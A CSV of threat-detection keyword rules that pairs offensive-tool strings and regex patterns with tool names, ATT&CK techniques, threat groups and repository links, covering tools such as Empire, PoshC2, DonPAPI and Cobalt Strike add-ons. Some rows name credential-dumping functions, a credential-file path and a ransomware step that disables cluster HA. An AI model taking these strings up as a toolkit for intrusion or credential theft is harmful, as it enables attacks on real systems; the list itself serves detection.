"*GetChromeSecrets*",".{0,1000}GetChromeSecrets.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","45923"
"*GETCLIPBOARD*GETLOCALGROUP*",".{0,1000}GETCLIPBOARD.{0,1000}GETLOCALGROUP.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","0","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","45924"
"*Get-ClipboardContents*",".{0,1000}Get\-ClipboardContents.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45925"
"*Get-ClipboardContents.ps1*",".{0,1000}Get\-ClipboardContents\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1070","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45926"
"*Get-CLSIDRegistryKeys -RegHive *",".{0,1000}Get\-CLSIDRegistryKeys\s\-RegHive\s.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","45927"
"*Get-Cluster|Set-Cluster -HAEnabled:$false -DrsEnabled:$false*",".{0,1000}Get\-Cluster\|Set\-Cluster\s\-HAEnabled\:\$false\s\-DrsEnabled\:\$false.{0,1000}","offensive_tool_keyword","powershell","Disable HA first before encrypt anything","T1190 - T1059.001 - T1027 - T1486 - T1108","TA0001 - TA0002 - TA0003 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","45928"
"*Get-CompressedAgent*",".{0,1000}Get\-CompressedAgent.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","45929"
"*Get-CompressedAgent.ps1*",".{0,1000}Get\-CompressedAgent\.ps1.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","45930"
"*Get-CompressedShellcode*",".{0,1000}Get\-CompressedShellcode.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","45931"
"*Get-CompressedShellcode.ps1*",".{0,1000}Get\-CompressedShellcode\.ps1.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","45932"
"*Get-ComputerDetails*",".{0,1000}Get\-ComputerDetails.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","45933"
"*Get-ComputerDetails.ps1*",".{0,1000}Get\-ComputerDetails\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","45934"
"*GetComputersFromActiveDirectory*",".{0,1000}GetComputersFromActiveDirectory.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45935"
"*Get-Content ""$env:LOCALAPPDATA\microsoft\remote desktop connection manager\rdcman.settings*",".{0,1000}Get\-Content\s\""\$env\:LOCALAPPDATA\\microsoft\\remote\sdesktop\sconnection\smanager\\rdcman\.settings.{0,1000}","offensive_tool_keyword","Decrypt-RDCMan","decrypts passwords stored in Remote Desktop Connection Manager (RDCMan) using DPAPI","T1003 - T1552 - T1081 - T1027","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/vmamuaya/Powershell/blob/master/Decrypt-RDCMan.ps1","1","0","N/A","N/A","9","1","1","1","2016-12-01T14:06:24Z","2017-11-22T23:18:39Z","45936"
"*Get-Content ./EncodedPayload.bat*",".{0,1000}Get\-Content\s\.\/EncodedPayload\.bat.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#linux","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","45937"
"*Get-Content ./Roast.hash*",".{0,1000}Get\-Content\s\.\/Roast\.hash.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#linux","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","45938"
"*Get-Content -path $dnshexfile *",".{0,1000}Get\-Content\s\-path\s\$dnshexfile\s.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","N/A","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","45939"
"*get-creditcarddata *",".{0,1000}get\-creditcarddata\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","45940"
"*Get-CredPersist*",".{0,1000}Get\-CredPersist.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","45941"
"*getCreds1passwordappEntries1.h*",".{0,1000}getCreds1passwordappEntries1\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","45942"
"*getCreds1passwordappEntries2.h*",".{0,1000}getCreds1passwordappEntries2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","45943"
"*getCreds1passwordappMaster.h*",".{0,1000}getCreds1passwordappMaster\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","45944"
"*getCreds1passwordplugin.h*",".{0,1000}getCreds1passwordplugin\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","45945"
"*getCreds1passwordplugin2.h*",".{0,1000}getCreds1passwordplugin2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","45946"
"*getCrossC2Beacon*",".{0,1000}getCrossC2Beacon.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","45948"
"*getCrossC2Site*",".{0,1000}getCrossC2Site.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","45949"
"*Get-DCBadPwdCount*",".{0,1000}Get\-DCBadPwdCount.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-SMBAutoBrute.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45950"
"*Get-DCsNotOwnedByDA*",".{0,1000}Get\-DCsNotOwnedByDA.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","45951"
"*Get-DecodedPassword*",".{0,1000}Get\-DecodedPassword.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","45952"
"*Get-DecodedPassword*",".{0,1000}Get\-DecodedPassword.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","45953"
"*Get-DecryptedCpassword*",".{0,1000}Get\-DecryptedCpassword.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","45954"
"*Get-DecryptedCpassword*",".{0,1000}Get\-DecryptedCpassword.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Get-SiteListPassword.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45955"
"*Get-DecryptedPassword*",".{0,1000}Get\-DecryptedPassword.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","45956"
"*Get-DecryptedPassword*",".{0,1000}Get\-DecryptedPassword.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","45957"
"*Get-DecryptedSitelistPassword*",".{0,1000}Get\-DecryptedSitelistPassword.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - 